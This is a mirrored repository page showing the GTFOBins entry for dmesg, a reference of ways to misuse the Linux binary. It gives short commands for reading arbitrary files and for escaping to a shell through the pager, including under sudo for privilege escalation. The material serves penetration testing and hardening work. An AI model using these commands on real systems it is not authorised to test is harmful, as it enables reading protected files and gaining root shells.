This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2025-12-28 11:11:41 +01:00
Code
Issues
08dfd05aee
GTFOBins.github.io
/
_gtfobins
/
dmesg.md
Andrea Cardaci
2e6fa047e9
Improve and document dmesg file read
2020-03-15 12:51:02 +01:00
530 B
Raw
Blame
History
functions
file-read
shell
sudo
description
code
This is not suitable for binary files.
LFILE=file_to_read dmesg -rF "$LFILE"
description
code
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
dmesg -H !/bin/sh
description
code
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
sudo dmesg -H !/bin/sh